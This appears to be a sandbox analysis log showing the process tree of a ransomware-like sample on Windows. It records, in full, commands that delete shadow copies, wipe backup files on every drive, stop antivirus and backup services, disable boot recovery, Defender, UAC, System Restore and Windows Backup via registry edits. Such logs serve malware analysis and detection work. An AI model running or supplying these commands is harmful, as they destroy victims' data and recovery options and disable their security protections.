C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵PID:1524
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB4⤵PID:1708
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2440
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵PID:2020
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB4⤵PID:2860
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB5⤵
- Interacts with shadow copies
PID:1824
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet3⤵PID:1736
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet4⤵PID:1152
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2180
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵PID:2032
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB4⤵PID:1832
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1016
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵PID:1968
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB4⤵PID:1492
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2388
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵PID:2060
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵PID:1612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵PID:904
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵PID:1420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵PID:1612
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵PID:2364
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵PID:904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵PID:1868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵PID:2748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵PID:1520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵PID:2036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵PID:592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵PID:1248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵PID:1824
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵PID:2504
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵PID:2184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵PID:2636
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵PID:1188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵PID:2272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵PID:3004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵PID:1292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵PID:3016
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵PID:200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵PID:212
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵PID:220
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵PID:232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵PID:2312
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵PID:1136
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵PID:1812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵PID:1784
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵PID:1156
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵PID:332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵PID:1608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵PID:2468
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"4⤵PID:2372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"5⤵PID:624
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵PID:1992
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵PID:3060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵PID:592
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵PID:2316
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵PID:1132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵PID:2420
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵PID:1580
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵PID:2196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵PID:1680
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵PID:2712
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵PID:2156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵PID:2788
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵PID:1400
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵PID:924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵PID:1564
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵PID:2868
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵PID:2580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵PID:1868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵PID:904
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵PID:1756
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵PID:688
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵PID:2588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵PID:2000
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵PID:1188
-
C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵PID:2260
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵PID:1872
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵PID:3028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵PID:2896
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵PID:2356
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵PID:1248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵PID:1328
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵PID:608
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵PID:2748
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵PID:1292
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵PID:1308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵PID:2688
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵PID:320
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵PID:2124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵PID:1104
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*3⤵PID:1572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵PID:2088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵PID:1732
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵PID:1812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵PID:1960
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵PID:2604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵PID:204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵PID:212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵PID:3056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵PID:2704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵PID:1000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵PID:2244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵PID:1876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵PID:2764
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵PID:232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵PID:2432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵PID:2780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵PID:560
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵PID:1520
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
PID:2144
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵PID:900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵PID:332
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵PID:2468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵PID:2812
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵PID:1156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵PID:3040
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵PID:592
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
PID:1944
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵PID:2624
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵PID:940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵PID:800
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵PID:2420
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
PID:1668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵PID:2308
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵PID:236
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:2164
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵PID:1760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵PID:1256
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵PID:576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵PID:3044
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:1564
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵PID:1824
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵PID:448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵PID:1356
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵PID:1756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵PID:2548
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵PID:1620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"3⤵PID:2576
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"4⤵PID:2844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"5⤵PID:2032
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵PID:2740
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵PID:1188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"3⤵PID:2896
-
C:\Windows\system32\net.exenet stop "macmnsvc"4⤵PID:3028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"5⤵PID:2008
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵PID:1872
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵PID:1248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵PID:2356
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵PID:2732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"3⤵PID:2756
-
C:\Windows\system32\net.exenet stop "masvc"4⤵PID:996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"5⤵PID:1536
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵PID:2272
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"3⤵PID:2860
-
C:\Windows\system32\net.exenet stop "MBAMService"4⤵PID:2512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"5⤵PID:1044
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵PID:468
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵PID:1796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"3⤵PID:2116
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"4⤵PID:2596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"5⤵PID:2388
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵PID:1644
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵PID:2248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵PID:324
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵PID:2976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"3⤵PID:2888
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"4⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"5⤵PID:984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵PID:796
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"3⤵PID:2256
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"4⤵PID:2352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"5⤵PID:308
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:2400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵PID:824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"3⤵PID:1648
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"4⤵PID:2300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"5⤵PID:1104
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:668
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵PID:2276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:2636
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵PID:1540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"3⤵PID:1624
-
C:\Windows\system32\net.exenet stop "McShield"4⤵PID:2620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"5⤵PID:2152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:1708
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵PID:2608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"3⤵PID:2100
-
C:\Windows\system32\net.exenet stop "mfemms"4⤵PID:1804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"5⤵PID:2568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵PID:1052
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵PID:2104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵PID:2088
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f4⤵PID:1724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"3⤵PID:2452
-
C:\Windows\system32\net.exenet stop "mfevtp"4⤵PID:2396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"5⤵PID:2344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵PID:2484
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f4⤵PID:2360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵PID:1996
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f4⤵PID:2424
-
-
-
